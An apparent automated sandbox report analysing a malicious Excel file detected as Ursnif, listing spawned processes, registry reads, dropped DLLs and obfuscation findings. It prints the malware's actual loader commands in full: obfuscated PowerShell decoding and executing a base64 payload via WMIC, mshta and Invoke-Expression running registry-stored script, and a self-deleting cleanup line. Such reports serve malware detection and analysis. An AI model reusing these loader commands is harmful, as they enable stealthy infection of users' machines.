Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\PING.EXEFile read: C:\Windows\System32\drivers\etc\hosts
Runs a DLL by calling functionsShow sources
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer
Sample is known by AntivirusShow sources
Source: MIL0001742828.xlsVirustotal: Detection: 16%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe
Source: unknownProcess created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.com
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2596 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2812 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\\DtshsPub'));if(!window.flag)close()</script>'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt))
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\AppData\Local\Temp\W'
Source: unknownProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9yJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.comJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServerJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2596 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -newJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2812 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp'
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp'
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\AppData\Local\Temp\W'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\user\AppData\Local\Temp\ygdsonvv.pdb source: csc.exe, 00000017.00000002.2585762402.00212000.00000004.00000001.sdmp, ygdsonvv.dll.23.dr
Source: Binary string: c:\Users\user\AppData\Local\Temp\v0kgxdqm.pdb source: csc.exe, 0000001C.00000003.2590267695.002CF000.00000004.00000001.sdmp, v0kgxdqm.dll.28.dr
Source: Binary string: mc:\Users\user\AppData\Local\Temp\ygdsonvv.pdb source: csc.exe, 00000017.00000002.2586272989.014CD000.00000004.00000001.sdmp
Source: Binary string: mc:\Users\user\AppData\Local\Temp\v0kgxdqm.pdb source: csc.exe, 0000001C.00000002.2595149226.0132D000.00000004.00000001.sdmp
Source: Binary string: c:\Read\Fruit\pay\Hold\child\Drive\Root\LikeSouth.pdb source: W.4.dr
Source: Binary string: Display this usage messageSSpecify debug information file name (default: output file name with .pdb extension)5### Visual C# 2005 Compiler Defect Report, created %s source: csc.exe, 00000017.00000002.2586001258.00300000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.2595029262.00320000.00000002.00000001.sdmp

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9yJump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe
Compiles C# or VB.Net codeShow sources
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_0045A17F push ecx; ret 8_2_0045A18F
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00459DB0 push ecx; ret 8_2_00459DB9

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE filesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ygdsonvv.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\v0kgxdqm.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
